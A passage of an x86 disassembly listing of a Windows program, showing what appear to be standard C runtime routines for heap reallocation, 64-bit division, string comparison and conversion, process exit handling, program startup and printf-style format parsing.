shl eax, 4
cmp eax, esi
jb short loc_419E63
mov eax, esi
loc_419E63: ; CODE XREF: sub_419C9F+1C0�j
push eax
push [ebp+lpMem]
push edi
call sub_417A40
push ebx
push [ebp+dwBytes]
push [ebp+var_4]
call sub_41BE20
add esp, 18h
loc_419E7C: ; CODE XREF: sub_419C9F+1A9�j
test edi, edi
jnz loc_419DD8
loc_419E84: ; CODE XREF: sub_419C9F+18B�j
; sub_419C9F+1B6�j
push esi ; dwBytes
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapAlloc
mov edi, eax
test edi, edi
jz short loc_419EDC
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_419EA5
mov eax, esi
loc_419EA5: ; CODE XREF: sub_419C9F+202�j
push eax
push [ebp+lpMem]
push edi
call sub_417A40
push ebx
push [ebp+dwBytes]
push [ebp+var_4]
call sub_41BE20
add esp, 18h
jmp short loc_419ED4
; ---------------------------------------------------------------------------
loc_419EC0: ; CODE XREF: sub_419C9F+17F�j
push esi ; dwBytes
push [ebp+lpMem] ; lpMem
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapReAlloc
mov edi, eax
loc_419ED4: ; CODE XREF: sub_419C9F+21F�j
test edi, edi
jnz loc_419DD8
loc_419EDC: ; CODE XREF: sub_419C9F+162�j
; sub_419C9F+1F8�j
cmp dword ptr byte_445EDC+0D443Ch, 0
jz loc_419DD8
push esi
call sub_41AE39
test eax, eax
pop ecx
jnz loc_419DFC
jmp short loc_419F38
; ---------------------------------------------------------------------------
loc_419EFA: ; CODE XREF: sub_419C9F+143�j
; sub_419C9F+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_419F24
test esi, esi
jnz short loc_419F08
push 1
pop esi
loc_419F08: ; CODE XREF: sub_419C9F+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi ; dwBytes
push [ebp+lpMem] ; lpMem
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapReAlloc
test eax, eax
jnz short loc_419F3A
loc_419F24: ; CODE XREF: sub_419C9F+260�j
cmp dword ptr byte_445EDC+0D443Ch, 0
jz short loc_419F3A
push esi
call sub_41AE39
test eax, eax
pop ecx
jnz short loc_419EFA
loc_419F38: ; CODE XREF: sub_419C9F+2B�j
; sub_419C9F+134�j ...
xor eax, eax
loc_419F3A: ; CODE XREF: sub_419C9F+16�j
; sub_419C9F+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419C9F endp
; =============== S U B R O U T I N E =======================================
sub_419F3F proc near ; CODE XREF: sub_40DB69+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword ptr byte_42409C+4
cmp eax, 0FFFFFFFFh
jnz short loc_419F5F
call GetLastError
push eax
call sub_41F64A
pop ecx
loc_419F5B: ; CODE XREF: sub_419F3F+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_419F5F: ; CODE XREF: sub_419F3F+D�j
test al, 1
jz short loc_419F80
test [esp+arg_4], 2
jz short loc_419F80
mov dword ptr byte_445EDC+0D43E4h, 0Dh
mov dword ptr byte_445EDC+0D43E8h, 5
jmp short loc_419F5B
; ---------------------------------------------------------------------------
loc_419F80: ; CODE XREF: sub_419F3F+22�j
; sub_419F3F+29�j
xor eax, eax
retn
sub_419F3F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419F90 proc near ; CODE XREF: sub_40DC92+5F�p
; sub_40DC92+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_419FB1
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_419FB1: ; CODE XREF: sub_419F90+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_419FCD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_419FCD: ; CODE XREF: sub_419F90+27�j
or eax, eax
jnz short loc_419FE9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41A02A
; ---------------------------------------------------------------------------
loc_419FE9: ; CODE XREF: sub_419F90+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_419FF7: ; CODE XREF: sub_419F90+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_419FF7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41A025
cmp edx, [esp+0Ch+arg_4]
ja short loc_41A025
jb short loc_41A026
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41A026
loc_41A025: ; CODE XREF: sub_419F90+85�j
; sub_419F90+8B�j
dec esi
loc_41A026: ; CODE XREF: sub_419F90+8D�j
; sub_419F90+93�j
xor edx, edx
mov eax, esi
loc_41A02A: ; CODE XREF: sub_419F90+57�j
dec edi
jnz short loc_41A034
neg edx
neg eax
sbb edx, 0
loc_41A034: ; CODE XREF: sub_419F90+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_419F90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41A040 proc near ; CODE XREF: sub_40DFEA+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41A08C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41A08D
test eax, 1
jz short loc_41A06D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41A0BA
inc esi
inc edi
dec eax
jz short loc_41A08A
loc_41A06D: ; CODE XREF: sub_41A040+20�j
; sub_41A040+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41A0BA
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41A0BA
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41A06D
loc_41A08A: ; CODE XREF: sub_41A040+2B�j
; sub_41A040+84�j
pop edi
pop esi
locret_41A08C: ; CODE XREF: sub_41A040+6�j
retn
; ---------------------------------------------------------------------------
loc_41A08D: ; CODE XREF: sub_41A040+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41A0C2
repe cmpsd
jz short loc_41A0C2
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41A0B5
cmp ch, dh
jnz short loc_41A0B5
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41A0B5
cmp ch, dh
loc_41A0B5: ; CODE XREF: sub_41A040+63�j
; sub_41A040+67�j ...
mov eax, 0
loc_41A0BA: ; CODE XREF: sub_41A040+26�j
; sub_41A040+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A0C2: ; CODE XREF: sub_41A040+55�j
; sub_41A040+59�j
test eax, eax
jz short loc_41A08A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41A0B5
dec eax
jz short loc_41A0E9
cmp dh, ch
jnz short loc_41A0B5
dec eax
jz short loc_41A0E9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41A0B5
dec eax
loc_41A0E9: ; CODE XREF: sub_41A040+8F�j
; sub_41A040+96�j
pop edi
pop esi
retn
sub_41A040 endp
; =============== S U B R O U T I N E =======================================
sub_41A0EC proc near ; CODE XREF: sub_40F12C+55�p
; sub_416B27+238�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_41A103
loc_41A0F9: ; CODE XREF: sub_41A0EC+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_41A0F9
loc_41A103: ; CODE XREF: sub_41A0EC+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_41A0EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A109(LPWSTR lpWideCharStr, LPCSTR lpMultiByteStr, int cchWideChar)
sub_41A109 proc near ; CODE XREF: sub_40F12C+19�p
; sub_40F12C+49�p
lpWideCharStr = dword ptr 8
lpMultiByteStr = dword ptr 0Ch
cchWideChar = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+lpWideCharStr]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_41A1D6
mov edi, [ebp+cchWideChar]
cmp edi, esi
jz loc_41A203
cmp dword ptr byte_445EDC+0D4474h, esi
jnz short loc_41A15A
cmp edi, esi
jbe loc_41A203
loc_41A139: ; CODE XREF: sub_41A109+4A�j
mov ecx, [ebp+lpMultiByteStr]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_41A203
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_41A139
jmp loc_41A203
; ---------------------------------------------------------------------------
loc_41A15A: ; CODE XREF: sub_41A109+26�j
mov ebx, [ebp+lpMultiByteStr]
mov esi, MultiByteToWideChar
push edi ; cchWideChar
push edx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ebx ; lpMultiByteStr
push 9 ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_41A202
call GetLastError
cmp eax, 7Ah
jz short loc_41A194
loc_41A185: ; CODE XREF: sub_41A109+CB�j
; sub_41A109+F7�j
mov dword ptr byte_445EDC+0D43E4h, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41A203
; ---------------------------------------------------------------------------
loc_41A194: ; CODE XREF: sub_41A109+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+lpMultiByteStr], ecx
loc_41A19C: ; CODE XREF: sub_41A109+B3�j
mov cl, [eax]
test cl, cl
jz short loc_41A1BE
mov edx, dword_43DD30
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41A1B3
inc eax
loc_41A1B3: ; CODE XREF: sub_41A109+A7�j
mov ecx, [ebp+lpMultiByteStr]
inc eax
dec [ebp+lpMultiByteStr]
test ecx, ecx
jnz short loc_41A19C
loc_41A1BE: ; CODE XREF: sub_41A109+97�j
push edi ; cchWideChar
sub eax, ebx
push [ebp+lpWideCharStr] ; lpWideCharStr
push eax ; cbMultiByte
push ebx ; lpMultiByteStr
push 1 ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_41A203
jmp short loc_41A185
; ---------------------------------------------------------------------------
loc_41A1D6: ; CODE XREF: sub_41A109+F�j
cmp dword ptr byte_445EDC+0D4474h, esi
jnz short loc_41A1E9
push [ebp+lpMultiByteStr]
call sub_4180D0
pop ecx
jmp short loc_41A203
; ---------------------------------------------------------------------------
loc_41A1E9: ; CODE XREF: sub_41A109+D3�j
push esi ; cchWideChar
push esi ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 9 ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
cmp eax, esi
jz short loc_41A185
loc_41A202: ; CODE XREF: sub_41A109+6B�j
dec eax
loc_41A203: ; CODE XREF: sub_41A109+1A�j
; sub_41A109+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41A109 endp
; =============== S U B R O U T I N E =======================================
sub_41A208 proc near ; CODE XREF: .text:0041A3F9�p
mov eax, dword ptr unk_43DCFC
test eax, eax
jz short loc_41A213
call eax ; unk_43DCFC
loc_41A213: ; CODE XREF: sub_41A208+7�j
push 42602Ch
push 426018h
call sub_41A2F0
push 426014h
push 426000h
call sub_41A2F0
add esp, 10h
retn
sub_41A208 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41A235(UINT uExitCode)
sub_41A235 proc near ; CODE XREF: .text:0041A438�p
uExitCode = dword ptr 4
push 0 ; int
push 0 ; int
push [esp+8+uExitCode] ; uExitCode
call sub_41A257
add esp, 0Ch
retn
sub_41A235 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41A246(UINT uExitCode)
sub_41A246 proc near ; CODE XREF: .text:0041A457�p
; sub_41D7DC+32A9�p ...
uExitCode = dword ptr 4
push 0 ; int
push 1 ; int
push [esp+8+uExitCode] ; uExitCode
call sub_41A257
add esp, 0Ch
retn
sub_41A246 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41A257(UINT uExitCode, int, int)
sub_41A257 proc near ; CODE XREF: sub_41A235+8�p
; sub_41A246+8�p
uExitCode = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword ptr byte_445EDC+0D442Ch, edi
jnz short loc_41A274
push [esp+4+uExitCode] ; uExitCode
call GetCurrentProcess ; GetCurrentProcess
push eax ; hProcess
call TerminateProcess ; TerminateProcess
loc_41A274: ; CODE XREF: sub_41A257+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword ptr byte_445EDC+0D4428h, edi
mov byte_445EDC+0D4424h, bl
jnz short loc_41A2C8
mov eax, dword ptr byte_445EDC+0D5A5Ch
test eax, eax
jz short loc_41A2B7
mov ecx, dword ptr byte_445EDC+0D5A58h
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_41A2B6
loc_41A2A3: ; CODE XREF: sub_41A257+5D�j
mov eax, [esi]
test eax, eax
jz short loc_41A2AB
call eax
loc_41A2AB: ; CODE XREF: sub_41A257+50�j
sub esi, 4
cmp esi, dword ptr byte_445EDC+0D5A5Ch
jnb short loc_41A2A3
loc_41A2B6: ; CODE XREF: sub_41A257+4A�j
pop esi
loc_41A2B7: ; CODE XREF: sub_41A257+3C�j
push 426038h
push 426030h
call sub_41A2F0
pop ecx
pop ecx
loc_41A2C8: ; CODE XREF: sub_41A257+33�j
push 426044h
push 42603Ch
call sub_41A2F0
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_41A2EE
push [esp+4+uExitCode]
mov dword ptr byte_445EDC+0D442Ch, edi
call dword ptr byte_424150
loc_41A2EE: ; CODE XREF: sub_41A257+85�j
pop edi
retn
sub_41A257 endp
; =============== S U B R O U T I N E =======================================
sub_41A2F0 proc near ; CODE XREF: sub_41A208+15�p
; sub_41A208+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_41A2F5: ; CODE XREF: sub_41A2F0+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_41A308
mov eax, [esi]
test eax, eax
jz short loc_41A303
call eax
loc_41A303: ; CODE XREF: sub_41A2F0+F�j
add esi, 4
jmp short loc_41A2F5
; ---------------------------------------------------------------------------
loc_41A308: ; CODE XREF: sub_41A2F0+9�j
pop esi
retn
sub_41A2F0 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41A30A(LPCSTR lpFileName)
sub_41A30A proc near ; CODE XREF: sub_40FCA3+2C69�p
lpFileName = dword ptr 4
push [esp+lpFileName] ; lpFileName
call DeleteFileA ; DeleteFileA
test eax, eax
jnz short loc_41A320
call GetLastError
jmp short loc_41A322
; ---------------------------------------------------------------------------
loc_41A320: ; CODE XREF: sub_41A30A+C�j
xor eax, eax
loc_41A322: ; CODE XREF: sub_41A30A+14�j
test eax, eax
jz short loc_41A331
push eax
call sub_41F64A
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41A331: ; CODE XREF: sub_41A30A+1A�j
xor eax, eax
retn
sub_41A30A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A334 proc near ; CODE XREF: sub_40FCA3+2BD7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_41F6B1
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A5BA
push [ebp+arg_0]
mov edi, eax
push esi
call sub_41F73E
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_41A334 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 4246A0h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call GetVersion ; GetVersion
xor edx, edx
mov dl, ah
mov dword ptr byte_445EDC+0D43FCh, edx
mov ecx, eax
and ecx, 0FFh
mov dword ptr byte_445EDC+0D43F8h, ecx
shl ecx, 8
add ecx, edx
mov dword ptr byte_445EDC+0D43F4h, ecx
shr eax, 10h
mov dword ptr byte_445EDC+0D43F0h, eax
xor esi, esi
push esi
call sub_41AFC9
pop ecx
test eax, eax
jnz short loc_41A3D2
push 1Ch
call sub_41A481
pop ecx
loc_41A3D2: ; CODE XREF: .text:0041A3C8�j
mov [ebp-4], esi
call sub_41E920
call GetCommandLineA ; GetCommandLineA
mov dword ptr byte_445EDC+0D5A4Ch, eax
call sub_41FC5D
mov dword ptr byte_445EDC+0D4430h, eax
call sub_41FA10
call sub_41F957
call sub_41A208
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call GetStartupInfoA ; GetStartupInfoA
call sub_41F8FF
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_41A41F
movzx eax, word ptr [ebp-2Ch]
jmp short loc_41A422
; ---------------------------------------------------------------------------
loc_41A41F: ; CODE XREF: .text:0041A417�j
push 0Ah
pop eax
loc_41A422: ; CODE XREF: .text:0041A41D�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword ptr byte_4240F8
push eax
call sub_40F1EA
mov [ebp-60h], eax
push eax
call sub_41A235
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_41F77B
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_41A246
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41A45C(DWORD NumberOfBytesWritten)
sub_41A45C proc near ; CODE XREF: .text:00418C88�p
; sub_41E920+1A�p ...
NumberOfBytesWritten= dword ptr 4
cmp dword ptr byte_445EDC+0D4438h, 1
jnz short loc_41A46A
call sub_41FE70
loc_41A46A: ; CODE XREF: sub_41A45C+7�j
push [esp+NumberOfBytesWritten] ; NumberOfBytesWritten
call sub_41FEA9
push 0FFh
call dword ptr unk_43DD20
pop ecx
pop ecx
retn
sub_41A45C endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41A481(DWORD NumberOfBytesWritten)
sub_41A481 proc near ; CODE XREF: .text:0041A3CC�p
NumberOfBytesWritten= dword ptr 4
cmp dword ptr byte_445EDC+0D4438h, 1
jnz short loc_41A48F
call sub_41FE70
loc_41A48F: ; CODE XREF: sub_41A481+7�j
push [esp+NumberOfBytesWritten] ; NumberOfBytesWritten
call sub_41FEA9
pop ecx
push 0FFh
call dword ptr byte_424150
retn
sub_41A481 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A4A5(int Buffer, int)
sub_41A4A5 proc near ; CODE XREF: sub_41795B+46�p
; sub_417EDA+45�p ...
Buffer = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_41A5AE
test al, 40h
jnz loc_41A5AE
test al, 1
jz short loc_41A4DD
and dword ptr [esi+4], 0
test al, 10h
jz loc_41A5AE
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_41A4DD: ; CODE XREF: sub_41A4A5+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41A517
cmp esi, 440468h
jz short loc_41A505
cmp esi, 440488h
jnz short loc_41A510
loc_41A505: ; CODE XREF: sub_41A4A5+56�j
push ebx
call sub_420040
test eax, eax
pop ecx
jnz short loc_41A517
loc_41A510: ; CODE XREF: sub_41A4A5+5E�j
push esi
call sub_41FFFC
pop ecx
loc_41A517: ; CODE XREF: sub_41A4A5+4E�j
; sub_41A4A5+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_41A584
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_41A547
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
push ebx ; int
call sub_41F033
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_41A57A
; ---------------------------------------------------------------------------
loc_41A547: ; CODE XREF: sub_41A4A5+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_41A562
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword ptr byte_445EDC+0D5924h[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_41A567
; ---------------------------------------------------------------------------
loc_41A562: ; CODE XREF: sub_41A4A5+A5�j
mov eax, 4400C8h
loc_41A567: ; CODE XREF: sub_41A4A5+BB�j
test byte ptr [eax+4], 20h
jz short loc_41A57A
push 2
push 0
push ebx
call sub_41EACB
add esp, 0Ch
loc_41A57A: ; CODE XREF: sub_41A4A5+A0�j
; sub_41A4A5+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+Buffer]
mov [eax], cl
jmp short loc_41A598
; ---------------------------------------------------------------------------
loc_41A584: ; CODE XREF: sub_41A4A5+79�j
push 1
lea eax, [ebp+Buffer]
pop edi
push edi ; nNumberOfBytesToWrite
push eax ; lpBuffer
push ebx ; int
call sub_41F033
add esp, 0Ch
mov [ebp+arg_4], eax
loc_41A598: ; CODE XREF: sub_41A4A5+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_41A5A4
or dword ptr [esi+0Ch], 20h
jmp short loc_41A5B3
; ---------------------------------------------------------------------------
loc_41A5A4: ; CODE XREF: sub_41A4A5+F7�j
mov eax, [ebp+Buffer]
and eax, 0FFh
jmp short loc_41A5B6
; ---------------------------------------------------------------------------
loc_41A5AE: ; CODE XREF: sub_41A4A5+10�j
; sub_41A4A5+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_41A5B3: ; CODE XREF: sub_41A4A5+FD�j
or eax, 0FFFFFFFFh
loc_41A5B6: ; CODE XREF: sub_41A4A5+107�j
pop esi
pop ebx
pop ebp
retn
sub_41A4A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5BA proc near ; CODE XREF: sub_41795B+29�p
; sub_417EDA+28�p ...
UsedDefaultChar = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_41ACD3
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_41A5EE
; ---------------------------------------------------------------------------
loc_41A5E6: ; CODE XREF: sub_41A5BA+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_41A5EE: ; CODE XREF: sub_41A5BA+2A�j
cmp [ebp+var_14], edx
jl loc_41ACD3
cmp bl, 20h
jl short loc_41A60F
cmp bl, 78h
jg short loc_41A60F
movsx eax, bl
mov al, [eax+42468Ch]
and eax, 0Fh
jmp short loc_41A611
; ---------------------------------------------------------------------------
loc_41A60F: ; CODE XREF: sub_41A5BA+40�j
; sub_41A5BA+45�j
xor eax, eax
loc_41A611: ; CODE XREF: sub_41A5BA+53�j
movsx eax, byte ptr [esi+eax*8+4246ACh]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_41ACC2 ; default
jmp off_41ACDB[eax*4] ; switch jump
loc_41A62F: ; DATA XREF: .text:off_41ACDB�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 0041A628 case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A64A: ; CODE XREF: sub_41A5BA+6E�j
; DATA XREF: .text:off_41ACDB�o
movsx eax, bl ; jumptable 0041A628 case 2
sub eax, 20h
jz short loc_41A68D
sub eax, 3
jz short loc_41A684
sub eax, 8
jz short loc_41A67B
dec eax
dec eax
jz short loc_41A672
sub eax, 3
jnz loc_41ACC2 ; default
or [ebp+var_4], 8
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A672: ; CODE XREF: sub_41A5BA+A4�j
or [ebp+var_4], 4
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A67B: ; CODE XREF: sub_41A5BA+A0�j
or [ebp+var_4], 1
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A684: ; CODE XREF: sub_41A5BA+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A68D: ; CODE XREF: sub_41A5BA+96�j
or [ebp+var_4], 2
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A696: ; CODE XREF: sub_41A5BA+6E�j
; DATA XREF: .text:off_41ACDB�o
cmp bl, 2Ah ; jumptable 0041A628 case 3
jnz short loc_41A6BE
lea eax, [ebp+arg_8]
push eax
call sub_41AD99
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_41ACC2 ; default
or [ebp+var_4], 4
neg eax
loc_41A6B6: ; CODE XREF: sub_41A5BA+111�j
mov [ebp+var_20], eax
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A6BE: ; CODE XREF: sub_41A5BA+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_41A6B6
; ---------------------------------------------------------------------------
loc_41A6CD: ; CODE XREF: sub_41A5BA+6E�j
; DATA XREF: .text:off_41ACDB�o
mov [ebp+var_10], edx ; jumptable 0041A628 case 4
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A6D5: ; CODE XREF: sub_41A5BA+6E�j
; DATA XREF: .text:off_41ACDB�o
cmp bl, 2Ah ; jumptable 0041A628 case 5
jnz short loc_41A6F8
lea eax, [ebp+arg_8]
push eax
call sub_41AD99
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_41ACC2 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A6F8: ; CODE XREF: sub_41A5BA+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A70A: ; CODE XREF: sub_41A5BA+6E�j
; DATA XREF: .text:off_41ACDB�o
cmp bl, 49h ; jumptable 0041A628 case 6
jz short loc_41A73D
cmp bl, 68h
jz short loc_41A734
cmp bl, 6Ch
jz short loc_41A72B
cmp bl, 77h
jnz loc_41ACC2 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A72B: ; CODE XREF: sub_41A5BA+15D�j
or [ebp+var_4], 10h
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A734: ; CODE XREF: sub_41A5BA+158�j
or [ebp+var_4], 20h
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A73D: ; CODE XREF: sub_41A5BA+153�j
cmp byte ptr [edi], 36h
jnz short loc_41A756
cmp byte ptr [edi+1], 34h
jnz short loc_41A756
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
